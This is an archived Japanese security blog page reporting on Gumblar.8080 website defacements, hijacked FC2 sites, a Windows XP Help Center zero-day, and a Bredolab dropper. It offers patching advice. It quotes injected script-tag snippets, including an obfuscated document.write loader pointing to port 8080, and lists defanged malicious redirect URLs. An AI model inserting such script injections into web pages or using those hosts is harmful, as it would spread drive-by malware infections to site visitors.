ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫ウイルス・セキュリティ

 Windowsパソコンをターゲットに有名ソフトの旧バージョンにある欠陥(脆弱性:ぜいじゃくせい)を悪用したウイルス攻撃が流行中! 古いバージョンを入れっぱなしだと強制的にウイルス感染地獄!
(1) 「Windows Update」(Microsoft Update)の”自動更新”を有効にする
(2) Adobe Readerを最新バージョンにする
  + [編集]メニュー→[環境設定]で[JavaScript]→[Acrobat JavaScriptを使用]のチェックを外す
(3) Adobe Flash Playerを最新バージョンにする
(4) Java(JRE)を最新バージョン版にする

 パソコンには、ウイルス対策ソフトを入れてください。「変なサイトには行ってない」「今まで感染したことがない」なんてな寝言は通用しません。どうしてもお金をかけたくないなら、ユーザーサポートがないですが無料ウイルス対策もどぞっ。

セキュリティソフトランキング ... 売れ筋人気製品
セキュリティソフト比較 ... 第三者評価機関、市場シェア
記事検索
検索

全37ページ

[10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21]

[ 前のページ | 次のページ ]

FC2ホームページ利用サイト100件が改ざんされ乗っ取られる (ガンブラー)

イメージ 2

 
 ここ数日でナンだか数が激増したので記事ネタに。。。 ;)

 FC2ホームページでレンタルされてるサイト100件以上がガンブラー改ざんで乗っ取られた上に、攻撃者が用意した不正なサイト(インチキなカナダ薬局や時計屋)に導くための踏み台になっとります。

 別にここ最近の出来事ではなくってだいぶ前からなんですが、先月の6月に忍者ホームページがパスワードを強制リセットする措置を行なってましたが、同じような状況が起こってたからなんですな。

 情報ソースは、迷惑メールに記載されてるURLアドレスのブラックリスト情報を公開してる海外サイト「URIBL.com」。そこに乗っ取られてるFC2ホームページを利用したサイトのURLアドレス「●●●.web.fc2.com」が、(この記事を書いてる時点で)130件ほどリストアップされてます。
http://rss.uribl.com/hosters/web_fc2_com.html
※ 改ざんサイトのリンクがまんま書き出されてるのでアクセス注意!
  (Firefoxのページ先読み機能とか)
 レンタルサービスを利用してるサイト運営者のパソコンがウイルス感染→パスワード奪取されたのが原因。ほとんどのサイトで訪問した人にウイルス感染させようとする不正なJavaScriptコードも挿入されちゃってます。(Gumblar.xタイプや8080タイプ)

 乗っ取られてるサイトで共通するのは、一番目の階層フォルダに「(ランダムな英単語)(ランダムな2桁数字).html」と同名の「〜 .jpg」というファイルが攻撃者によってアップロードされてること。これは運営者にしか分かりませんが・・・。(下の赤い囲い)

イメージ 1

 で、このアップロードされたファイルは、ウイルスに感染させて乗っ取ったパソコンを使って大量配信される迷惑メールの本文中で使われます。

開くトラックバック(1)

ガンブラーが未修正の脆弱性を突いてウイルス感染攻撃 (Gumblar.8080)

 Gumblar.8080タイプのサイト改ざん攻撃が、Windows XP&Windows Server 2003に影響するまだ修正されてないゼロデイ状態な脆弱性を悪用してウイルスを強制感染させようとしてるとのことで、JPCERT/CCも注意情報を発表してます。
Windows のヘルプとサポートセンターの未修正の脆弱性に関する注意喚起 (JPCERT/CC)
最新Gumblar、Windows「ヘルプとサポートセンター」の脆弱性を利用 〜JPCERTが注意喚起 (RBB Today)
止まらぬサイト改ざん(1):「ヘルプとサポートセンター」ゼロデイ攻撃開始 (So-netセキュリティ通信)

 で、昨日の27日の記事では攻撃処理が行なわれるサイトにアクセスできん・・・、ということだったけれど、今日ちゃんと海外プロクシを指して突撃してきました。攻撃コードの画像をのせておきます。

 http://farm5.static.flickr.com/4120/4741487343_1c79831aa8.jpg

 前半部分が修正されてない脆弱性を突く処理用、後半部分が今までの「Adobe Reader」「Java」の脆弱性を突く処理用になります。(大っきい画像

ドライブバイ・ダウンロード対策

開くトラックバック(0)

Windows XPの未修正ゼロデイ攻撃が。。。 (Gumblar.8080)

 IBM Tokyo SOC Reportによると、Gumblar.8080がWindows XP、Windows Server 2003に影響がある、まだ修正されてない脆弱性を悪用する処理(ゼロデイ状態)が含まれてること〜。 :(
Windows のヘルプとサポート センターの脆弱性を悪用する攻撃

 ユーザーエージェント(UA)を見てIE7ブラウザの場合に降ってくるそうで。こちとらIE6ブラウザを想定して調べてたので、さっそくIE7ブラウザに切り替えて突撃してみたけれど、ぜんぜんアクセスできん・・・。アクセス制限が激しくて、1度アクセスすると2度目はなかなか降ってこんのよ〜。 :(

 ウィンドウズ・アップデートでの対応はまだなので、マイクロソフトが提供してる「Fix It」プログラムを実行して機能を無効化させます。
脆弱性対策を〜Windows XPとServer 2003用Fix It公開 (So-netセキュリティ通信)
Windows XPを狙ったゼロデイ攻撃が出現、ヘルプ機能の脆弱性を突く (ITpro)

開くトラックバック(0)

新タイプの不正な改ざんコードにご注意を。。。 (Gumblar.8080)

 先週書いたGumbalar.8080の新タイプな改ざんコードですが、今週になってから誘導先のURLアドレスに新たなものがどんどこ大量投入されました。

 ぜーんぶ乗っ取られてしまった正規ドメインのURLアドレスっぽいので、ブラックリストタイプのURLブロック機能は対応されるまでの数日間はスルーしてしまう可能性が・・・。 :(

 改ざんされると、下のような不正なJavaScriptコードが挿入されます。

□ HTMLファイルの場合:
・位置はページの最後尾
<script type="text/javascript" src="http://●●.■■.▲▲:8080/***.js"></script>
<!--(〜 30文字程度の英数字 〜)-->
□ 外部JSファイルの場合:
・位置はファイルの最後尾
document.write('<s'+'cript type="text/javascript" src="http://●●.■■.▲▲▲:8080/***.js"></scr'+'ipt>');
サイト改ざん被害・攻撃サイト判定の対処方法

 この不正なコードで導かれる飛び先では、Microsoft関連、Java(JRE)Adobe Readerの脆弱性を悪用して、ウイルスを強制的に発動させようとしてます。

・Microsoft関連は、Windows XPに影響がある未修正ゼロデイ攻撃あり <26日追記
・Java(JRE)は、2010年4月に修正された脆弱性を悪用する処理が含まれてます。(参考ページ
・Adobe Reader(PDFファイル)は、最新版でも修正されてない脆弱性を悪用する処理(ゼロデイ状態)は今のとこ含まれてません。(参考ページ
昨日24日にゲットしてきた不正なPDFファイルの解析結果:
http://jsunpack.jeek.org/dec/go?report=d4f42df46ff348680c1322d6050e00b5c1b538a0
 (※セキュリティソフトが警告する場合アリ)

● 強制的に発動するウイルス
 脆弱性を悪用して最終的に強制発動する実行ファイルです。今日ゲットしてきたもの。Bredolabという名前のウイルスで、いろいろな別のウイルスを調達してきて感染させパソコンを乗っ取ります。

 先週あたりに投入されたものみたいで検知率は大分高いでしょうか。
VirusTotalの結果:
http://www.virustotal.com/jp/analisis/fc89cfc9ff5ff9dda2e83d96d95d8fd8e13c3634f31f445e870e366feaa7edaa-1277476491
 挙動を知るため、Comodoが提供してるマルウェア解析機に放り投げてみました。自分自身を「sisytj32.exe」というファイル名でスタートアップに登録して活動開始するようです。ちなみに、チョット前は「siszpe32.exe」というファイル名で、日本での感染報告がいくつかあがってます。
Comodo Instant Malware Analysisの結果:
http://camas.comodo.com/cgi-bin/submit?file=fc89cfc9ff5ff9dda2e83d96d95d8fd8e13c3634f31f445e870e366feaa7edaa

開くトラックバック(0)

Gumblar.8080改ざんに新タイプのJavaScriptコード

イメージ 1

イメージ 2

 
 6月11日あたりからになりますが、Gumblar.8080タイプの改ざん攻撃で、攻撃者によってページに挿入される今までJavaScriptコード
<script>(〜 長ーい意味不明な文字列 〜)</script>
とは異なるスタイルのものが出現してます。この飛び先は、攻撃者に乗っ取られてしまった正規サイトみたいです。(ドメインのレジスタがGoDaddyだらけなのは偶然かへ?
<script type="text/javascript" src="http://■■■■■/●●●●●.js"></script>
 当初の飛び先こんなの。改ざんサイトごとにバラバラなJSファイル名。
sogpaoiy.the-mlmpowercall. com/PC.js
sogpaoiy.the-mlmpowercall. com/Index.js
sogpaoiy.the-mlmpowercall. com/Mac_OS.js
sogpaoiy.the-mlmpowercall. com/Infotainment.js
sogpaoiy.the-mlmpowercall. com/Facebook.js

 今日14日あたりから投入された飛び先の例。
temp.hbsouthmomsclub. com:8080/Kbps.js
temp.hbsouthmomsclub. com:8080/Website.js
aospfpgy.dogplaystation. com:8080/Unix.js
aospfpgy.dogplaystation. com:8080/OASIS.js
aospfpgy.dogplaystation. com:8080/Access_Point.js
aospfpgy.dogplaystation. com:8080/Gigahertz.js
aospfpgy.dogplaystation. com:8080/Page_View.js
kollinsoy.skyefenton. com:8080/Kibibyte.js
kollinsoy.skyefenton. com:8080/Scrolling.js
kollinsoy.skyefenton. com:8080/Hardware.js
kollinsoy.skyefenton. com:8080/Parallel_Port.js
kollinsoy.skyefenton. com:8080/HDMI.js

 このスタイルのJavaScriptコードだと、Yahoo!やGoogleの検索エンジンを使って改ざんサイトを見つけ出すのがムリになっちゃいます。

(6月14日 追記...)
Malware on Hijacked Subdomains. Part 2. (Unmask Parasites. Blog.)

(6月25日 追記...)
新タイプの不正な改ざんコードにご注意を。。。 (Gumblar.8080)

開くトラックバック(0)

全37ページ

[10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21]

[ 前のページ | 次のページ ]

Yahoo!ブログからのお知らせ

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • 物知りマン
  • Kerupani129
  • who
  • ★ピサロ★
  • Cookies
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

ふるさと納税サイト『さとふる』
実質2000円で特産品がお手元に
11/30までキャンペーン実施中!
数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!

その他のキャンペーン

みんなの更新記事
前へ 次へ